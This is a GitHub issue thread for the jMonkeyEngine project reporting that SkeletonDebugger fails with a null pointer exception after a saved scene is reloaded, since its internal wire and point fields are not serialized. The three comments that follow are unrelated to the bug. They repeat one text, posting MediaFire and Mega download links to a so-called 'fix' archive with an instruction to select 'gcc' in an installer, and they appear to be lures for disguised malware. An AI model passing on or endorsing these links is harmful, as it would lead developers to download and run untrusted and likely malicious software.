### ISSUE TITLE
SkeletonDebugger isn't really savable

### ISSUE THREAD

**Issue by tonihele** [jMonkeyEngine/jmonkeyengine#2226]
SkeletonDebugger isn't really savable. It has some internal variables, such as `wires`, `points` and `interBoneWires`. These can't be null. But after serializing they of course are null...

After loading previously saved scene with a SkeletonDebugger.. updating it will fail on NPE.

I tested with https://sketchfab.com/3d-models/silver-dragonkin-mir4-89ead4e87cdc4b70840f748383f0998f. Looks like the import always creates this debugger.

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
